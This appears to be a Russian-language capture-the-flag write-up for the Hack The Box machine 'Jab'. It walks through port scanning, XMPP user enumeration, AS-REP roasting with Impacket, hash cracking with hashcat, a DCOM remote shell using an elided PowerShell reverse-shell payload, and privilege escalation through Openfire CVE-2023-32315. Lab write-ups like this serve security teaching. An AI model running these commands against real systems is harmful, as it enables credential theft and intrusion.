Telegram / Boosty / Видео
Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.
Также на https://boosty.to/kiberdruzhinnik/posts/25008ed3-d91d-425e-859d-5b42e0f5197f я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.
Обзор сервисов
Начнем разведку машины с помощью сканирования портов утилитой rustscan
:
Open 10.129.107.62:53
Open 10.129.107.62:88
Open 10.129.107.62:636
Open 10.129.107.62:593
Open 10.129.107.62:464
Open 10.129.107.62:445
Open 10.129.107.62:389
Open 10.129.107.62:139
Open 10.129.107.62:135
Open 10.129.107.62:5985
Open 10.129.107.62:5276
Open 10.129.107.62:5275
Open 10.129.107.62:5270
Open 10.129.107.62:5269
Open 10.129.107.62:5263
Open 10.129.107.62:5262
Open 10.129.107.62:5223
Open 10.129.107.62:5222
Open 10.129.107.62:7777
Open 10.129.107.62:7443
Open 10.129.107.62:7070
Добавим в /etc/hosts
домены jab.htb dc01.jab.htb
.
XMPP / Jabber
Видим много портов, связанных с XMPP / Jabber. Воспользуемся клиентом Pidgin и зарегистрируем себе пользователя.
Далее попробуем найти список всех пользователей сервера.
Мы получаем огромный список пользователей домена, которые нам нужно экспортировать в файл usernames.txt
.
Теперь с помощью пакета Impacket попробуем на всех этих пользователей выписать TGT, надеясь, что у них стоит флаг Do not require Kerberos preauthentication
(процесс долгий, пользователей более 2600):
impacket-GetNPUsers jab.htb/ -usersfile usernames.txt -outputfile outputusers.txt -dc-ip 10.129.107.62 -no-pass
В результате из более 2600 пользователей нам удалось стащить TGT у трех пользователей:
Попробуем их сбрутить.
hashcat -m 18200 -a 0 hash.txt rockyou.txt
В итоге получаем пароль пользователя, с помощью которого снова подключимся к XMPP-серверу.
Обнаруживаем комнату pentest2003
и в ней новые учетные данные.
С помощью impacket-dcomexec
и PowerShell #3 (Base64) из revshells.com
получаем шелл:
impacket-dcomexec -silentcommand -object MMC20 jab.htb/svc_openfire:'pwd'@10.129.107.62 "powershell -e ..."
Флаг пользователя
Повышение привилегий
Проверим сетевые подключения и обнаружим порт 9090:
Пробросим порт на локальную машину и обнаружим административную панель Openfire. Логинимся с помощью известных учетных данных.
Далее просто получаем шелл с помощью установки плагина из репозитория https://github.com/miko550/CVE-2023-32315.